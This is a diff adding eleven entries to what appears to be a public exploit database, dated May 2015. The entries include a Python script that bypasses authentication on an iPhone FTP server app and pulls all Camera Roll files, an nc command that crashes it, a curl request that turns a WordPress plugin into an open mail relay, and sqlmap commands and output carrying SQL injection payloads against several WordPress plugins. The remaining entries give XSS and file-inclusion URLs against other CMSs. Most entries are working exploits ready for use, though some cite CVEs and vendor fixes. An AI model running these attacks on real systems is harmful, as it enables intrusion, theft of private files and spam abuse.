DB: 2015-05-26

11 new exploits

files.csv

@@ -10261,7 +10261,7 @@ id,file,description,date,author,platform,type,port
 11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer <= 5.9.14.1246 - ActiveX Remote Exec PoC (0day)",2010-01-17,superli,windows,dos,0
 11177,platforms/php/webapps/11177.txt,"Joomla Component com_prime Directory Traversal",2010-01-17,FL0RiX,php,webapps,0
 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros SQL Injection Vulnerability",2010-01-17,FL0RiX,php,webapps,0
-11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2",2010-01-18,"John Babio",windows,remote,0
+11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2 - BoF",2010-01-18,"John Babio",windows,remote,0
 11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - (.mp3) Local Denial of Service (DoS)",2010-01-18,Red-D3v1L,windows,dos,0
 11182,platforms/windows/dos/11182.txt,"Internet Explorer 6/7/8 - DoS Vulnerability (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0
 11183,platforms/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilites",2010-01-18,"Prashant Khandelwal",php,webapps,0
@@ -33392,7 +33392,6 @@ id,file,description,date,author,platform,type,port
 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
 37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0
 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,"Wad Deek",php,webapps,0
-37005,platforms/hardware/webapps/37005.txt,"IPLINK IP-DL-801RT-B - (Url Filter Configuration Panel) Stored XSS",2015-05-13,"XoDiAK BlackHat",hardware,webapps,0
 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0
 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross Site Scripting Vulnerability",2012-03-24,3spi0n,php,webapps,0
 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability",2012-03-23,voidloafer,java,webapps,0
@@ -33479,3 +33478,14 @@ id,file,description,date,author,platform,type,port
 37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 index.php redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0
 37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 'username' Parameter Cross Site Scripting Vulnerability",2012-04-20,sonyy,php,webapps,0
 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0
+37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0
+37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0
+37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0
+37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0
+37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 Information Disclosure_ SQL Injection and Cross Site Scripting Vulnerabilities",2012-04-26,"Jakub Galczyk",php,webapps,0
+37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 'jsoncallback' Parameter Cross Site Scripting Vulnerability",2012-04-26,"Jakub Galczyk",php,webapps,0
+37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 'p' Parameter Cross Site Scripting Vulnerability",2012-04-26,"Jakub Galczyk",php,webapps,0
+37106,platforms/php/webapps/37106.txt,"Wordpress Video Gallery Plugin 2.8 Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80
+37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80
+37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80
+37109,platforms/php/webapps/37109.txt,"WordPress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80

platforms/ios/remote/37097.py

@@ -0,0 +1,70 @@
+#!/usr/bin/env python
+#==================================================================================
+# Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
+# Date: 2015-05-25
+# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
+# Exploit Author's Homepage: http://www.mikeallen.org
+# Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
+# Version: 3.0
+# Tested on: iPhone
+#==================================================================================
+# ------------------
+# Denial of Service:
+# ------------------
+# The FTP server does not properly handle errors raised by invalid 
+# FTP commands. The following command, which sends an invalid PORT command to 
+# the FTP server, will crash the server once it is received.
+
+# echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000
+
+# ----------------------
+# Authentication Bypass:
+# ----------------------
+# The FTP server does not handle unauthenticated connections or incorrect login
+# credentials properly. A remote user can issue commands to the FTP server 
+# without authenticating or after entering incorrect credentials.
+
+# The following proof-of-concept connects to the given FTP server and 
+# downloads all files stored in the "Camera Roll" folder without providing a
+# username or password:
+
+import sys
+from ftplib import FTP
+
+if len(sys.argv) <= 1:
+    print "Usage: ./ftp-nologin.py [host] [port]"
+    exit()
+
+host = sys.argv[1]    
+port = int(sys.argv[2])
+
+files = []
+
+def append_file(s):
+    files.append(s.split(' ')[-1])
+
+blocks = []
+def get_blocks(d):
+    blocks.append(d)
+
+ftp = FTP()
+print ftp.connect(host, port)
+ftp.set_pasv(1)
+ftp.cwd("Camera Roll")
+print ftp.retrlines('LIST', append_file)
+
+files.pop(0)
+
+for filename in files:
+    print "Downloading %s..." % filename
+    ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)
+
+    f = open(filename, 'wb')
+    for block in blocks:
+        f.write(block)
+    f.close()
+    print "[+] File saved to: %s" % filename
+    
+    blocks = []
+
+ftp.quit()

platforms/php/webapps/37100.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/53202/info
+
+Waylu CMS is prone to an SQL-injection vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible. 
+
+HTML Injection
+
+http://www.example.com/WebApps/products_xx.php?id=[XSS]
+
+SQL Injection
+
+http://www.example.com/WebApps/products_xx.php?id=[SQL Injection] 

platforms/php/webapps/37101.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53208/info
+
+The CCNewsLetter module for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CCNewsLetter 1.0.7 is vulnerable; prior versions may also be affected. 
+
+ http://www.example.com/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] 

platforms/php/webapps/37102.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/53237/info
+
+The Video Gallery component for Joomla! is prone to local file-include and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the affected application. Information harvested may aid in further attacks.
+
+The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. 
+
+http://www.example.com/index.php?option=com_videogallery&Itemid=68'
+
+http://www.example.com/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]--
+
+http://www.example.com/&controller=../../../../../../../../../../../../[LFT]%00 

platforms/php/webapps/37103.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/53268/info
+
+concrete5 is prone to information-disclosure, SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to harvest sensitive information, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
+
+concrete5 5.5.2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata
+
+http://www.example.com/concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form 

platforms/php/webapps/37104.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53269/info
+
+gpEasy is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+gpEasy 2.3.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php/Admin_Preferences?gpreq=json&jsoncallback=<h1>test<br>test2<%2fh1> 

platforms/php/webapps/37105.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53273/info
+
+Quick.CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Quick.CMS 4.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/admin/?p=[xss] 

platforms/php/webapps/37106.txt

@@ -0,0 +1,118 @@
+######################
+
+# Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page
+
+# Exploit Author : Claudio Viviani
+
+# Website Author: http://www.homelab.it
+                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
+
+# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
+
+# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
+
+# Dork Google: index of "contus-video-gallery"
+            
+
+# Date : 2015-04-05
+
+# Tested on : Windows 7 / Mozilla Firefox
+              Linux / Mozilla Firefox         
+
+######################
+
+# Description
+
+ Wordpress Video Gallery 2.8 suffers from Unprotected Mail Page.
+ 
+ This vulnerability is exploitable to dos, phishing, mailbombing, spam...
+ 
+ The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php)
+ 
+  /**
+  * Email function
+  */
+ add_action( 'wp_ajax_email', 'email_function' );
+ add_action( 'wp_ajax_nopriv_email', 'email_function' );
+ 
+ function email_function() {
+     require_once( dirname( __FILE__ ) . '/email.php' );
+     die();
+ }
+
+ Any user can send email from /contus-video-gallery/email.php to any recipients.
+ 
+ The variables used to send emails are:
+ 
+ $to   = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
+ $from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
+ $url  = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
+ $subject  = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
+ $message_content =  filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
+ $title    = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
+ $referrer = parse_url( $_SERVER['HTTP_REFERER'] );
+ $referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
+ $pageURL  = 'http';
+ 
+ It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:
+ 
+ if ( $referrer_host === $pageURL ) {
+     $headers = "MIME-Version: 1.0" . "\r\n";
+     $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";	
+     $headers .= "From: " . "<" . $from . ">\r\n";
+     $headers .= "Reply-To: " . $from . "\r\n";
+     $headers .= "Return-path: " . $from;
+     $username = explode('@' , $from );   
+     $username = ucfirst($username['0']);
+     $subject  =  $username . ' has shared a video with you.';
+     $emailtemplate_path  = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';	
+     $message =  file_get_contents( $emailtemplate_path);
+     $message = str_replace( '{subject}', $subject, $message );
+     $message = str_replace( '{message}', $message_content, $message);
+     $message = str_replace( '{videourl}',$url,$message );
+     $message = str_replace('{username}',$username ,$message );
+     if ( @mail( $to, $title, $message, $headers ) ) {
+         echo 'success=sent';
+     } else {
+         echo 'success=error';
+     }
+ } else {
+     echo 'success=error';
+ }
+ 
+ The “Referer” field can easily be modified by the attacker!
+
+######################
+
+# PoC
+
+ curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
+ -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email
+
+ cUrl switch "-e" spoof referer address
+
+# Http Response
+
+  success=sent 
+  
+# Poc Video
+
+http://youtu.be/qgOGPm1-tNc
+ 
+
+#######################
+
+Discovered By : Claudio Viviani
+                http://www.homelab.it
+                http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
+                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
+				
+                info@homelab.it
+                homelabit@protonmail.ch
+
+                https://www.facebook.com/homelabit
+                https://twitter.com/homelabit
+                https://plus.google.com/+HomelabIt1/
+                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+#####################

platforms/php/webapps/37107.txt

@@ -0,0 +1,68 @@
+# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
+# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
+# Date: 2015-05-25
+# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
+# Active installs: 20,000+
+# Vulnerable version: 0.9.8
+# Fixed version: 0.9.9
+# CVE: CVE-2015-4062, CVE-2015-4063
+
+ Vulnerabilities (2)
+=====================
+
+(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
+-----------------------------------------------
+
+* CODE:
+includes/nsp_search.php:94
++++++++++++++++++++++++++++++++++++++++++
+for($i=1;$i<=3;$i++) {
+    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
+        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
+    }
+}
++++++++++++++++++++++++++++++++++++++++++
+
+* POC:
+http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
+
+SQLMap
++++++++++++++++++++++++++++++++++++++++++
+./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
+[............]
+GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
+sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
+---
+Parameter: where1 (GET)
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+    Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
+---
+[12:25:59] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Debian 7.0 (wheezy)
+web application technology: Apache 2.2.22, PHP 5.4.39
+back-end DBMS: MySQL 5.0.12
++++++++++++++++++++++++++++++++++++++++++
+
+
+(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
+----------------------------------------------
+
+includes/nsp_search.php:128
++++++++++++++++++++++++++++++++++++++++++
+for($i=1;$i<=3;$i++) {
+    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
+}
++++++++++++++++++++++++++++++++++++++++++
+
+* POC:
+http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
+
+
+ Timeline
+==========
+2015-05-09: Discovered vulnerability.
+2015-05-19: Vendor notification.
+2015-05-19: Vendor response.
+2015-05-20: Vendor fix.
+2015-05-25: Public disclosure.

platforms/php/webapps/37108.txt

@@ -0,0 +1,68 @@
+# Title: Multiple vulnerabilities in WordPress plugin "WordPress Landing Pages"
+# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
+# Date: 2015-05-25
+# Vendor Homepage: https://wordpress.org/plugins/landing-pages/
+# Active installs: 20,000+
+# Vulnerable version: 1.8.4
+# Fixed version: 1.8.5
+# CVE: CVE-2015-4064, CVE-2015-4065 
+
+ Vulnerabilities (2)
+=====================
+
+(1) Authenticated SQLi [CWE-89] (CVE-2015-4064)
+-----------------------------------------------
+
+* CODE:
+modules/module.ab-testing.php:100
++++++++++++++++++++++++++++++++++++++++++
+$wpdb->query("
+    SELECT `meta_key`, `meta_value`
+    FROM $wpdb->postmeta
+    WHERE `post_id` = ".$_GET['post']."
+");
++++++++++++++++++++++++++++++++++++++++++
+
+* POC:
+http://[domain]/wp-admin/post.php?post=306[SQLi]&action=edit&lp-variation-id=1&ab-action=delete-variation
+
+SQLMap
++++++++++++++++++++++++++++++++++++++++++
+./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/post.php?post=306&action=edit&lp-variation-id=0&ab-action=delete-variation" -p post
+[............]
+GET parameter 'post' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
+sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
+---
+Parameter: post (GET)
+   Type: AND/OR time-based blind
+   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+   Payload: post=306 AND (SELECT * FROM (SELECT(SLEEP(10)))sCKL)&action=edit&lp-variation-id=0&ab-action=delete-variation
+---
+[13:35:01] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Debian 7.0 (wheezy)
+web application technology: Apache 2.2.22, PHP 5.4.39
+back-end DBMS: MySQL 5.0.12
++++++++++++++++++++++++++++++++++++++++++
+
+
+(2) Authenticated XSS [CWE-79] (CVE-2015-4065)
+----------------------------------------------
+
+* CODE:
+shared/shortcodes/inbound-shortcodes.php:761
++++++++++++++++++++++++++++++++++++++++++
+<iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe>
++++++++++++++++++++++++++++++++++++++++++
+
+
+* POC:
+http://[domain]/wp-admin/post-new.php?post_type=inbound-forms&post='></iframe><script>alert(String.fromCharCode(88, 83, 83))</script>
+
+
+ Timeline
+==========
+2015-05-09: Discovered vulnerability.
+2015-05-20: Vendor notification.
+2015-05-20: Vendor response.
+2015-05-22: Vendor fix.
+2015-05-25: Public disclosure.

platforms/php/webapps/37109.txt

@@ -0,0 +1,102 @@
+# Title: SQLi vulnerabilities in WordPress plugin "GigPress"
+# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
+# Date: 2015-05-25
+# Vendor Homepage: https://wordpress.org/plugins/gigpress/
+# Active installs: 20,000+
+# Vulnerable version: 2.3.8
+# Fixed version: 2.3.9
+# CVE: CVE-2015-4066
+
+ Vulnerabilities (2)
+=====================
+
+(1) Authenticated SQLi [CWE-89]
+-------------------------------
+
+* CODE:
+admin/handlers.php:87
++++++++++++++++++++++++++++++++++++++++++
+$show['show_tour_id'] = $_POST['show_tour_id'];
++++++++++++++++++++++++++++++++++++++++++
+admin/handlers.php:94
++++++++++++++++++++++++++++++++++++++++++
+$artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . "");
++++++++++++++++++++++++++++++++++++++++++
+
+
+* POC:
+http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
+POST DATA:
+_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new
+
+SQLMap
++++++++++++++++++++++++++++++++++++++++++
+./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql
+[............]
+POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
+sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
+---
+Parameter: show_artist_id (POST)
+   Type: error-based
+   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
+   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new
+
+   Type: AND/OR time-based blind
+   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new
+---
+[12:21:09] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Debian 7.0 (wheezy)
+web application technology: Apache 2.2.22, PHP 5.4.39
+back-end DBMS: MySQL 5.0
++++++++++++++++++++++++++++++++++++++++++
+
+
+(2) Authenticated SQLi [CWE-89]
+-------------------------------
+
+* CODE:
+admin/handlers.php:71
++++++++++++++++++++++++++++++++++++++++++
+$show['show_venue_id'] = $_POST['show_venue_id'];
++++++++++++++++++++++++++++++++++++++++++
+admin/handlers.php:95
++++++++++++++++++++++++++++++++++++++++++
+$venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A);
++++++++++++++++++++++++++++++++++++++++++
+
+
+* POC:
+http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
+POST DATA:
+_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new
+
+SQLMap
++++++++++++++++++++++++++++++++++++++++++
+./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql
+[............]
+POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
+sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
+---
+Parameter: show_venue_id (POST)
+   Type: error-based
+   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
+   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new
+
+   Type: AND/OR time-based blind
+   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new
+---
+[12:23:57] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Debian 7.0 (wheezy)
+web application technology: Apache 2.2.22, PHP 5.4.39
+back-end DBMS: MySQL 5.0
++++++++++++++++++++++++++++++++++++++++++
+
+
+Timeline
+========
+2015-05-09: Discovered vulnerability.
+2015-05-20: Vendor notification.
+2015-05-20: Vendor response and fix.
+2015-05-25: Public disclosure.